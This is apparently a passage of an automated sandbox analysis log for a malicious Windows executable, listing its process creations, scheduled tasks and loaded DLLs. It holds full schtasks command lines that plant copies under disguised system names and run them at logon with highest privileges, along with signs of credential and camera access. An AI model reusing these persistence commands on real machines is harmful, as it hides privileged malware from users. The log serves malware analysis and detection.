                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\lv961v43L3.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3361714780.000000001CEE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera');
                              Source: hzSiynbOWa.41.dr, TNlmI3foeW.41.dr, jmWZu0Jun8.41.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: lv961v43L3.exeReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\lv961v43L3.exeFile read: C:\Users\user\Desktop\lv961v43L3.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP"
                              Source: unknownProcess created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP"
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\SystemSettings.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lv961v43L3" /sc ONLOGON /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknownProcess created: C:\Users\user\Desktop\lv961v43L3.exe C:\Users\user\Desktop\lv961v43L3.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\lv961v43L3.exe C:\Users\user\Desktop\lv961v43L3.exe
                              Source: unknownProcess created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                              Source: unknownProcess created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                              Source: unknownProcess created: C:\Users\Default\SystemSettings.exe "C:\Users\Default User\SystemSettings.exe"
                              Source: unknownProcess created: C:\Users\Default\SystemSettings.exe "C:\Users\Default User\SystemSettings.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
                              Source: unknownProcess created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
                              Source: unknownProcess created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                              Source: unknownProcess created: C:\Users\Default\SystemSettings.exe "C:\Users\Default User\SystemSettings.exe"
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP"Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
